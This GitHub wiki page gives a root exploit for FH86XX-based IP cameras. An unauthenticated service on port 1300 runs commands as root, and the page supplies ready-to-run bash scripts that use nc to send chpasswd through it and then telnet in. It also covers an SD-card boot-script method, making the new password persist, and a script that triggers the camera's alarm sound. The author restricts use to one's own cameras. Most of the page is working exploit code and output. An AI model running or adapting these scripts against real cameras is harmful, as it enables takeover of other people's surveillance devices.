FH86XX based Cameras root exploit. This may, or indeed may not work on your camera. You use it entirely at your own risk. - pingumacpenguin/FH86XX_Cameras GitHub Wiki
Your FH86XX based camera may be vulnerable to an exploit that allows us to execute code on the device as root. In the vulnerable firmware, a service listening on TCP port 1300 accepts a command wrapped in <SYSTEM>...</SYSTEM> tags, runs it as root without any authentication, and answers with <SYSTEM_ACK>...</SYSTEM_ACK>.
Obviously you should only do this to cameras that you own. If you hack into somebody else's camera, you can expect the full weight of the law to come down on you in whatever jurisdiction you reside. I do not advocate doing anything illegal with this knowledge.
I can't claim credit for finding this trick; that goes to some useful info I found in some very interesting posts on Reddit from Mediocre-Peanut982 (https://www.reddit.com/r/hardwarehacking/comments/1bnelr9/comment/lc6uyco/)
also (https://www.reddit.com/r/hardwarehacking/comments/1cu1vus/comment/l8o29xo/)
All credit therefore to Mediocre-Peanut982 on Reddit for the basic idea, to which I added a few refinements. Here is my take on Mediocre-Peanut982's script.
Save the above vuln.sh bash script and run it without arguments for instructions.
(Linux only of course, unless you like to torture yourself with Windoze's bizarre linux shell extensions).
$ ./vuln.sh
USAGE [vuln.sh OPTION IP NEW_PASSWORD]
To check for vulnerabilities : vuln.sh check IP new_password
If vulnerable, password will be changed to whatever you pass as new_password and you will be offered the chance to telnet to the device
To see the camera's image : vuln.sh show
This assumes you have already run vuln.sh check to generate the image
$
This should give you unfettered root access.
NOTE: root access obtained this way only lasts until the camera reboots.
It does not permanently change the root password, because the persistent copy of the hash is stored in a separate area of flash.
It only alters the temporary /etc/shadow file, which doesn't survive a reboot.
Here it is in action.
$ ./vuln.sh check ipcam1 wombat
[.]Checking RCE in port 1300
[+]Vulnerability Found
[+]RCE is available on port 1300
[.]Checking RCE in port 843
[-]Port 843 isn't vulnerable to RCE
[.]Checking telnet access
[+]Telnet is available on port 23
[.]Trying to get a live image
[-]Getting live image failed
[?]Do you want to get a shell[y/n]: y
[+]Changing root hash
[+]Response: <SYSTEM_ACK>ok</SYSTEM_ACK>
[+]Log in via this LOGIN:root PASSWD:wombat
[+]
Trying 192.168.7.4...
Connected to ipcam1.
Escape character is '^]'.
(none) login: root
Password:
BusyBox v1.26.2 (2023-08-17 14:38:28 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
[/app]#
The second method involves adding a file to the SD card and rebooting the camera.
First, insert an SD card into the camera and let it boot up and run. Then remove the SD card.
Create a directory on the SD card called upgrade. Inside that directory, create a script called iu.sh containing this single line:
echo "root:root" | chpasswd
Save the file and make it executable with "chmod +x iu.sh".
Now unmount the SD card, put it back in the camera, boot the camera and telnet into it as root:root. The camera runs upgrade/iu.sh from the card during boot with root privileges, which is what lets the chpasswd take effect.
For what it's worth, you could use root:wombat to set the password to wombat, or whatever you like.
Thanks again to (Mediocre-Peanut982) for the tip.
My condensed version of the first method is below.
```bash
#!/bin/bash
# quickroot.sh: push a chpasswd command through the unauthenticated
# <SYSTEM>...</SYSTEM> interface on port 1300, then telnet in as root.
ip="${1:-unknown_ip}"        # camera hostname or IP (required)
port="${2:-1300}"            # the vulnerable command port
new_password="${3:-root}"    # root password to set; lasts until the next reboot
# Whatever sits inside <SYSTEM>...</SYSTEM> is run as root; the camera
# replies with <SYSTEM_ACK>ok</SYSTEM_ACK> on success.
response=$(echo "<SYSTEM>echo \"root:$new_password\" | chpasswd</SYSTEM>" | nc "$ip" "$port")
echo "$response"
telnet "$ip"
```
Save this as quickroot.sh and chmod it +x.
Run it with at least the IP; you can add the port and an alternative password if you want.
$ ./quickroot.sh ipcam1
Trying 192.168.7.4...
Connected to ipcam1.
Escape character is '^]'.
(none) login: root
Password:
BusyBox v1.26.2 (2023-08-17 14:38:28 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
[/app]#
One more trick. Say you want to permanently set the root password to "wombat2"
Telnet to the camera and enter this...
echo root:wombat2 | chpasswd; cp /etc/shadow /app/userdata/shadow; cd /app; /app/app_shadow.sh
reboot
When the camera has restarted, you should now be able to use the new root password.
The camera is no more secure than it ever was, however: the original exploit will still work, so if you forget the new password, simply start again.
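The following helper is an added example, not code from this wiki, from Mediocre-Peanut982's script or from the camera firmware. It generalises quickroot.sh and the persistent-password trick above into reusable functions: it builds the <SYSTEM>...</SYSTEM> envelope, parses the <SYSTEM_ACK> reply, refuses passwords that would break the user:password line chpasswd reads, and sends a harmless probe before touching anything so a silent or non-vulnerable port is reported instead of guessed at. The probe command, the -w timeout on nc, the hostname default ipcam1 and the function names are my assumptions; the command strings themselves are the ones used on this page.

```bash
#!/bin/bash
# Added example: helpers around the FH86XX port 1300 command interface.
# Usage: ./fh_root.sh ipcam1 wombat [port]
set -u

# Wrap a shell command in the envelope the port 1300 service expects.
fh_payload() {
    printf '<SYSTEM>%s</SYSTEM>' "$1"
}

# Extract the text between <SYSTEM_ACK> and </SYSTEM_ACK>; empty if absent.
fh_ack() {
    printf '%s' "$1" | sed -n 's/.*<SYSTEM_ACK>\(.*\)<\/SYSTEM_ACK>.*/\1/p'
}

# Return 0 if a raw response carries an "ok" acknowledgement.
fh_is_ok() {
    [ "$(fh_ack "$1")" = "ok" ]
}

# Send one command to the camera and print the raw response.
# nc -w 3 is an assumption: it keeps a silent port from hanging the script.
fh_send() {
    local ip="$1" port="$2" cmd="$3"
    fh_payload "$cmd" | nc -w 3 "$ip" "$port"
}

# The command quickroot.sh uses: change root's password for this boot only.
fh_chpasswd_cmd() {
    printf 'echo "root:%s" | chpasswd' "$1"
}

# The persistence trick from above: update /etc/shadow, copy it to the
# userdata area and run the camera's own app_shadow.sh so it survives a reboot.
fh_persist_cmd() {
    printf 'echo root:%s | chpasswd; cp /etc/shadow /app/userdata/shadow; cd /app; /app/app_shadow.sh' "$1"
}

# Reject passwords that would corrupt the "user:password" line or the envelope.
fh_password_ok() {
    nl='
'
    case "$1" in
        ""|*:*|*"$nl"*) return 1 ;;
    esac
    return 0
}

# Probe the port with a harmless command, then set the password.
# Pass persist=1 as the fourth argument to use the reboot-surviving variant.
fh_root() {
    local ip="${1:-ipcam1}" pw="${2:-root}" port="${3:-1300}" persist="${4:-0}" resp cmd
    fh_password_ok "$pw" || { echo "bad password (empty, or contains ':' / newline)" >&2; return 2; }
    resp=$(fh_send "$ip" "$port" "true")
    fh_is_ok "$resp" || { echo "port $port did not acknowledge the probe: '$resp'" >&2; return 1; }
    if [ "$persist" = "1" ]; then cmd=$(fh_persist_cmd "$pw"); else cmd=$(fh_chpasswd_cmd "$pw"); fi
    resp=$(fh_send "$ip" "$port" "$cmd")
    fh_is_ok "$resp" || { echo "chpasswd not acknowledged: '$resp'" >&2; return 1; }
    echo "root password set to '$pw' (persist=$persist); telnet $ip and log in as root"
}

# Only act when arguments are given, so the functions can also be sourced.
if [ "$#" -gt 0 ]; then
    fh_root "$@"
fi
```

The probe matters because a response of empty text, a refused connection or an ack other than ok all mean the firmware on that unit is not behaving as described here, and the script stops before sending chpasswd. Remember that with persist=1 the camera still needs the reboot from the trick above for the new hash to be the one loaded at start-up.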
Whether any of this trickery is likely to break anything I have no idea, so it goes without saying that you do any or all of this entirely at your own risk.
That's all for now. Have fun.
Oh.. and speaking of fun...
```bash
#!/bin/bash
# Play the camera's built-in alarm sound through the same port 1300
# command interface that quickroot.sh uses (runs as root on the camera).
ip="${1:-ipcam1}"    # camera hostname or IP
port="${2:-1300}"    # the vulnerable command port
response=$(echo "<SYSTEM> /app/abin/playaudio /app/res/wav/alarm.aac </SYSTEM>" | nc "$ip" "$port")
echo "$response"
```
I'm sure you can figure out what that does pretty easily.